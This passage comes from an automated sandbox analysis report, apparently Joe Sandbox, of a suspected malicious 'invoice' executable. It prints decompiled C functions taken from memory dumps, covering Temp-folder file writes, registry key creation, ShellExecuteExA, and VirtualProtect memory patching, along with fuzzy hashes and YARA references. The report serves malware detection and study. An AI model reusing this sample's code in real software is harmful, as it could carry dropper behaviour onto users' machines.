0x00000000
0x004055e3
0x00000000

APIs

CreateDirectoryA.KERNELBASE(?,00000000,004031E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 004055D5
GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004055E3

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: f012ed4f2e447eb03a7c1a9074efbf4aa4d4dcf66ab1e3e2b7403bfb804529af
Instruction ID: ff59ce228810ab0b399ea54ffc24e93d20618ce1ebfa51e1db99450e15aaec59
Opcode Fuzzy Hash: f012ed4f2e447eb03a7c1a9074efbf4aa4d4dcf66ab1e3e2b7403bfb804529af
Instruction Fuzzy Hash: FAC08C30200101ABDB010B318F08B073A62AB80380F0288396042E00B4CA308004C92E

Uniqueness

Uniqueness Score: -1.00%

Function 004025C4 Relevance: 1.6, APIs: 1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004025C4(intOrPtr __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr _t27;
				intOrPtr _t33;
				void* _t38;
				void* _t41;

				_t33 = __edx;
				 *((intOrPtr*)(_t38 - 8)) = __ebx;
				_t27 = E00402A9F(2);
				_t41 = _t27 - 1;
				 *((intOrPtr*)(_t38 - 0x3c)) = _t33;
				 *((intOrPtr*)(_t38 - 0xc)) = _t27;
				if(_t41 < 0) {
					L24:
					 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t38 - 4));
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *((intOrPtr*)(__ebp - 0xc)) = 0x3ff;
					}
					if( *__esi == __bl) {
						L21:
						__esi =  *((intOrPtr*)(__ebp - 8));
						goto L22;
					} else {
						 *((char*)(__ebp + 0xb)) = __bl;
						 *(__ebp - 0x30) = E00405EDC(__ecx, __esi);
						if( *((intOrPtr*)(__ebp - 0xc)) <= __ebx) {
							goto L21;
						} else {
							__esi =  *((intOrPtr*)(__ebp - 8));
							while(1) {
								__eax = __ebp - 0xd;
								__eax = E00405B76( *(__ebp - 0x30), __ebp - 0xd, "true"); // executed
								if(__eax == 0) {
									break;
								}
								if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
									 *(__ebp - 0xd) & 0x000000ff = E00405EC3(__edi,  *(__ebp - 0xd) & 0x000000ff);
								} else {
									if( *((char*)(__ebp + 0xb)) == 0xd ||  *((char*)(__ebp + 0xb)) == 0xa) {
										__al =  *(__ebp - 0xd);
										if( *((intOrPtr*)(__ebp + 0xb)) == __al || __al != 0xd && __al != 0xa) {
											__eax = SetFilePointer( *(__ebp - 0x30), 0xffffffff, __ebx, "true");
										} else {
											 *((char*)(__esi + __edi)) = __al;
											__esi = __esi + 1;
										}
										break;
									} else {
										__al =  *(__ebp - 0xd);
										 *((char*)(__esi + __edi)) = __al;
										__esi = __esi + 1;
										 *((char*)(__ebp + 0xb)) = __al;
										if(__al == __bl) {
											break;
										} else {
											if(__esi <  *((intOrPtr*)(__ebp - 0xc))) {
												continue;
											} else {
												break;
											}
										}
									}
								}
								goto L25;
							}
							L22:
							 *((char*)(__esi + __edi)) = __bl;
							if(_t41 == 0) {
								 *((intOrPtr*)(_t38 - 4)) = 1;
							}
							goto L24;
						}
					}
				}
				L25:
				return 0;
			}

0x004025c4
0x004025c6
0x004025c9
0x004025ce
0x004025d2
0x004025d5
0x004025d8
0x00402951
0x00402954
0x004025de
0x004025de
0x004025e5
0x004025e7
0x004025e7
0x004025ec
0x00402674
0x00402674
0x00000000
0x004025f2
0x004025f3
0x004025fe
0x00402601
0x00000000
0x00402603
0x00402603
0x00402606
0x00402606
0x0040260f
0x00402616
0x00000000
0x00000000
0x0040261b
0x00402644
0x0040261d
0x00402621
0x0040264e
0x00402654
0x0040266c
0x0040265e
0x0040265e
0x00402661
0x00402661
0x00000000
0x00402629
0x00402629
0x0040262c
0x0040262f
0x00402632
0x00402635
0x00000000
0x00402637
0x0040263a
0x00000000
0x0040263c
0x00000000
0x0040263c
0x0040263a
0x00402635
0x00402621
0x00000000
0x0040261b
0x00402677
0x00402677
0x004015b0
0x00402716
0x00402716
0x00000000
0x004015b0
0x00402601
0x004025ec
0x0040295a
0x00402960

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: wsprintf
String ID:
API String ID: 2111968516-0
Opcode ID: e235dcb744ebcc946608d91797e9ef60a83683288e53699933f586765b830fd2
Instruction ID: 7874e25a1fd417281295b021b6ee833f9e9a2ca8db09fa59ccc2d9f5114d9ff1
Opcode Fuzzy Hash: e235dcb744ebcc946608d91797e9ef60a83683288e53699933f586765b830fd2
Instruction Fuzzy Hash: 33213B70D04299BECF318B689548AAEBF709F11304F14847FE4D0B62D1C5BE8A82CF19

Uniqueness

Uniqueness Score: -1.00%

Function 00402682 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E00402682(intOrPtr __edx, void* __eflags) {
				long _t7;
				long _t9;
				LONG* _t11;
				void* _t13;
				intOrPtr _t14;
				void* _t17;
				void* _t19;

				_t14 = __edx;
				_push(ds);
				if(__eflags != 0) {
					_t7 = E00402A9F(2);
					_pop(_t13);
					 *((intOrPtr*)(_t19 - 0x3c)) = _t14;
					_t9 = SetFilePointer(E00405EDC(_t13, _t17), _t7, _t11,  *(_t19 - 0x1c)); // executed
					if( *((intOrPtr*)(_t19 - 0x24)) >= _t11) {
						_push(_t9);
						E00405EC3();
					}
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x00402682
0x00402682
0x00402683
0x0040268b
0x00402690
0x00402691
0x004026a0
0x004026a9
0x004028f7
0x004028f9
0x004028f9
0x004026a9
0x00402954
0x00402960

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004026A0

Part of subcall function 00405EC3: wsprintfA.USER32 ref: 00405ED0

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: 7662d08dcc9a9cf2f1584379864cce10a11a63027859f8beda7d63d36f93d70d
Instruction ID: f1c15ab6bd15a9d9cc501090f462d0785fe3296bea48be5e975bb3477ad6cc2f
Opcode Fuzzy Hash: 7662d08dcc9a9cf2f1584379864cce10a11a63027859f8beda7d63d36f93d70d
Instruction Fuzzy Hash: 49E06DB2B04216AED700BBA5AA49DBFBB68DB40314F20403BF544F10C1CA788D029B2D

Uniqueness

Uniqueness Score: -1.00%

Function 00405E19 Relevance: 1.5, APIs: 1, Instructions: 24
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E19(void* __eflags, intOrPtr _a4, char* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00405D70(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegCreateKeyExA(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}

0x00405e23
0x00405e2c
0x00405e42
0x00000000
0x00405e42
0x00405e30
0x00000000

APIs

RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402B72,00000000,?,?), ref: 00405E42

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction ID: bcdd098ccac6e5ba1724694a98921d4690075513e21ad273718db18b073b7b07
Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction Fuzzy Hash: 3FE0E67201050DBEDF095F50DD0EDBB371DEB14304F00492EFA55D4090E6B5AD209E74

Uniqueness

Uniqueness Score: -1.00%

Function 00405B76 Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405B76(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405b7a
0x00405b8a
0x00405b92
0x00000000
0x00405b99
0x00000000
0x00405b9b

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031A6,00000000,00000000,00402FD0,000000FF,00000004,00000000,00000000,00000000), ref: 00405B8A

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
Instruction ID: d6e1a33fd195441beba49eedd959afadaf6b56434895abd4101947bffd5346ea
Opcode Fuzzy Hash: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
Instruction Fuzzy Hash: 21E0EC3221065EABDF10AE559C04AEB7B6CEB05360F004437F915E3150D635F9219BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405BA5 Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405BA5(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405ba9
0x00405bb9
0x00405bc1
0x00000000
0x00405bc8
0x00000000
0x00405bca

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040315C,00000000,00415428,000000FF,00415428,000000FF,000000FF,00000004,00000000), ref: 00405BB9

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
Instruction ID: 823d1a00ca840d25d454e1cdeec80758da7ba5e35e2b738bcb0e321267d0793f
Opcode Fuzzy Hash: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
Instruction Fuzzy Hash: DEE0EC3222075EAFDF50AE559C00AEB7B7CEB05760F004437F925E2190E631F9219BAC

Uniqueness

Uniqueness Score: -1.00%

Function 10002709 Relevance: 1.5, APIs: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x10004038 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x1000404c, 4, 0x40, 0x1000403c); // executed
					 *0x1000404c = 0xc2;
					 *0x1000403c = 0;
					 *0x10004044 = 0;
					 *0x10004058 = 0;
					 *0x10004048 = 0;
					 *0x10004040 = 0;
					 *0x10004050 = 0;
					 *0x1000404e = 0;
				}
				return 1;
			}

0x10002712
0x10002717
0x10002727
0x1000272f
0x10002736
0x1000273b
0x10002740
0x10002745
0x1000274a
0x1000274f
0x10002754
0x10002754
0x1000275c

APIs

VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 10002727

Memory Dump Source

Source File: 00000001.00000002.8818214645.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.8818183154.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.8818247570.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.8818279279.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_invoice.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
Instruction ID: e09dfa788fffc30199ef0a9f627684cb70e95bce5f527532b7ad3e980fb418b3
Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
Instruction Fuzzy Hash: 67F09BF19092A0DEF360DF688CC47063FE4E3983D5B03852AE358F6269EB7441448B19

Uniqueness

Uniqueness Score: -1.00%

Function 00405DEB Relevance: 1.5, APIs: 1, Instructions: 19
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405DEB(void* __eflags, intOrPtr _a4, char* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00405D70(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegOpenKeyExA(_t7, _a8, 0, _a12, _a16); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}

0x00405df5
0x00405dfc
0x00405e0f
0x00000000
0x00405e0f
0x00405e00
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00405E79,?,?,?,?,00000002,Call), ref: 00405E0F

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction ID: dc79c12829c29cd0bf07e2dbeefb197667dc07549b84f10616122407915bdb74
Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction Fuzzy Hash: E4D0123210060DBBDF115F90ED05FAB371DEB48314F004826FE45A4091E775D670AF98

Uniqueness

Uniqueness Score: -1.00%

Function 0040159D Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040159D() {
				int _t5;
				void* _t11;
				int _t14;

				_t5 = SetFileAttributesA(E00402AC1(0xfffffff0),  *(_t11 - 0x24)); // executed
				_t14 = _t5;
				if(_t14 == 0) {
					 *((intOrPtr*)(_t11 - 4)) = 1;
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t11 - 4));
				return 0;
			}

0x004015a8
0x004015ae
0x004015b0
0x00402716
0x00402716
0x00402954
0x00402960

APIs

SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 5ad63c811bd6e2538171b99d50506fd6de1cb9b06f815e9fd29dad5dee90db35
Instruction ID: 006896c4a7345e69559ade13805c89d17ea4f3f6c129434cfdd3d67a61d48342
Opcode Fuzzy Hash: 5ad63c811bd6e2538171b99d50506fd6de1cb9b06f815e9fd29dad5dee90db35
Instruction Fuzzy Hash: 10D012727081129BCB10EBA8AB48A9E77A49B50324B308137D515F31D1E6B9C945672D

Uniqueness

Uniqueness Score: -1.00%

Function 00404072 Relevance: 1.5, APIs: 1, Instructions: 9
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404072(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x42ebd8; // 0x103bc
				if(_t2 != 0) {
					_t3 = SendMessageA(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}

0x00404072
0x00404079
0x00404084
0x00000000
0x00404084
0x0040408a

APIs

SendMessageA.USER32(000103BC,00000000,00000000,00000000), ref: 00404084

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 72d0fdd0e21cb56c477cf419d385c95605940825065c69d2cee1e8d6d2b2924a
Instruction ID: da44989f2a2ecf2e1eb1395d2787a6f6d01b979c61270caf9d732ef337717c06
Opcode Fuzzy Hash: 72d0fdd0e21cb56c477cf419d385c95605940825065c69d2cee1e8d6d2b2924a
Instruction Fuzzy Hash: B6C04C717406006AEA208B519E49F0677586750B11F1484397751F50D0C675E410DE1C

Uniqueness

Uniqueness Score: -1.00%

Function 00405647 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405647(struct _SHELLEXECUTEINFOA* _a4) {
				struct _SHELLEXECUTEINFOA* _t4;
				int _t5;

				_t4 = _a4;
				_t4->lpIDList = _t4->lpIDList & 0x00000000;
				_t4->cbSize = 0x3c; // executed
				_t5 = ShellExecuteExA(_t4); // executed
				return _t5;
			}

0x00405647
0x0040564c
0x00405650
0x00405656
0x0040565c

APIs

ShellExecuteExA.SHELL32(?,0040444B,?), ref: 00405656

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
Opcode ID: 3dbb5c45fd0362357dc29e094c299a4b113cabf0b50495ccaf1730ce731ee503
Instruction ID: fedc52184ae6edd1acf052e6849869f1d6de8b7351bc39b82099fbd6471e80b9
Opcode Fuzzy Hash: 3dbb5c45fd0362357dc29e094c299a4b113cabf0b50495ccaf1730ce731ee503
Instruction Fuzzy Hash: ECC092B2000200DFE301CF90CB18F077BE8AF55306F028058E1C49A160C7788810CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040405B Relevance: 1.5, APIs: 1, Instructions: 6
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040405B(int _a4) {
				long _t2;

				_t2 = SendMessageA( *0x42f408, 0x28, _a4, "true"); // executed
				return _t2;
			}

0x00404069
0x0040406f

APIs

SendMessageA.USER32(00000028,?,?,00403E8B), ref: 00404069

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 2bf10b83fa6dd9bc40a18547b02fbce2a65827e50004d0a7ab2884d4d9fdcea2
Instruction ID: 0adc9c0e194aa77c868d6ef978719a9753de7db756a7c543b14a3307e76eee0a
